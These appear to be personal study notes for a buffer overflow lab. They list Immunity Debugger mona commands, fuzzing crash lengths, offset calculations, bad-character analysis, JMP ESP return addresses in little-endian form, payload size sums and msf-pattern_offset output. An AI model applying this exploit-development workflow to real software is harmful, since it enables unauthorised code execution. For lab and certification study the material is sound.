!mona commands:

1. !mona config -set workingfolder c:\mona\%p

2. !mona findmsp -distance 600

3. !mona bytearray -b "\x00"

4. !mona compare -f C:\mona\oscp\bytearray.bin -a <address>

5. !mona bytearray -b "\x00\xbadchar"

6. !mona jmp -r esp -cpb "\x00"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
see: BOF tutorial by hacking article

at 1600 byte --> crashed   

arbitary payload made --> 1600 byte

offset --> 1514

shellcode --> 351 byte


Address	          Status                   BadChars
0x0182fa30  Corruption after 6 bytes   00 04 05 3e 3f e1 e2
				       => \x00\x04\x05\x3e\x3f\xe1\xe2
				       => \x00\x04\x3e\x3f\xe1    <---- Bad Char (3e didn't corrupt 3f)

					HERE, technically, badchar should be => \x00\x04\x3e\xe1

					(as bad char tends to corrupt next char as
					 well that doesn't mean that adjucent char
					  is bad char)  -> 05 3f e2 should be victims
 Type	    Location
 normal      Stack


ret addr: 

0x625011af  => lSB --> \xaf\x11\x50\x62
0x625011bb  => LSB --> \xbb\x11\x50\x62
0x625011c7  => LSB --> \xc7\x11\x50\x62
0x625011d3  => LSB --> \xd3\x11\x50\x62
0x625011df  => LSB --> \xdf\x11\x50\x62
0x625011eb  => LSB --> \xeb\x11\x50\x62
0x625011f7  => LSB --> \xf7\x11\x50\x62
0x62501205  => LSB --> \x05\x12\x50\x62

-----------------------------
Eg:

payload = 

prefix + 1978 + 4 + 16 + 351 ---> 2349 + prefix --> 2349 + 10 --> 2359  (<= 2400)

______________________________________________________________________


at 2100 byte --> crashed

payload made --> 2100 byte  

-----> Technically, it would also work, to find the offset but if it was taken, 
       making payload would be difficult.

_____________
Eg:

kali@reveng ~/T/B/OVERFLOW2> msf-pattern_offset -l 2000 -q 76413176
[*] Exact match at offset 1274

kali@reveng ~/T/B/OVERFLOW2> msf-pattern_offset -l 2100 -q 76413176
[*] Exact match at offset 1274
------------

offset --> 1514  => min. byte to overflow buffer/stack

crashed at --> 1600 => offset present b/w 1500 and 1600 (most probably) according to fuzzing script




